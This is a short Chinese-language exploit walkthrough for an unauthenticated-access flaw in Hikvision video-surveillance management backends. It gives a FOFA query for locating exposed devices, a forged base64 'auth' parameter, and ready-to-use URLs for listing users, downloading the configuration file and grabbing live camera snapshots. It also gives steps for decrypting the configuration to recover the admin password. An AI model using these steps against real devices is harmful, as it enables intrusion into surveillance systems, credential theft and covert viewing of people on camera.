fofa: app=”HIKVISION-视频监控”
HIKVISION监控设备管理后台存在未授权,通过构造url可绕过登录查看监控,检索所有用户和配置文件下载。
构造url主要是通过如下的auth
参数构造生成base64加密字段,如下所示:
➜ echo admin:11 |base64
YWRtaW46MTEK
http://{ip.addr}:{ip.port}/Security/users?auth=YWRtaW46MTEK
返回xml信息:
<UserList version="1.0">
<User version="1.0">
<id>1</id>
<userName>admin</userName>
<priority>high</priority>
<ipAddress>0.0.0.0</ipAddress>
<macAddress>00:00:00:00:00:00</macAddress>
<userLevel>Administrator</userLevel>
</User>
</UserList>
http://{ip.addr}:{ip.port}/System/configurationFile?auth=YWRtaW46MTEK
➜ file configurationFile
configurationFile: PGP Secret Key -
如上,我们配置文件下载完成后可以看到是PGP加密文件,所以我们需要对文件进行解密才可以找到账号密码的配置信息;文件解密出的账号密码就是监控设备后台管理的账号密码信息,我们得到信息直接登录即可。解密软件用法及链接如下:
Open Configuration File ->
Encrypted ->
Decrypt Data(Decrypting AES...) ->
(Successfully decrypted data) ->
Save Configuration File.
用 010-Editor程序打开decrypted data 文件. 文件内搜索admin字符串,如左图;
Boom! Easy to find password! (admin:asdf1234)
* 我们通过[Usage]来获得的帐号密码登录即可,有机会会从代码角度分析一下为什么存在未授权访问
Desc | Link |
---|---|
Download Hikvision exec | hikvision-decrypter.exe and here is: Repos |
Download configurationFile Sample | configurationFile |
Download configurationFile decry-Sample | configurationFile-decry |
http://{ip.addr}:{ip.port}/onvif-http/snapshot?auth=YWRtaW46MTEK
当前时间下监控的快照图片
以上。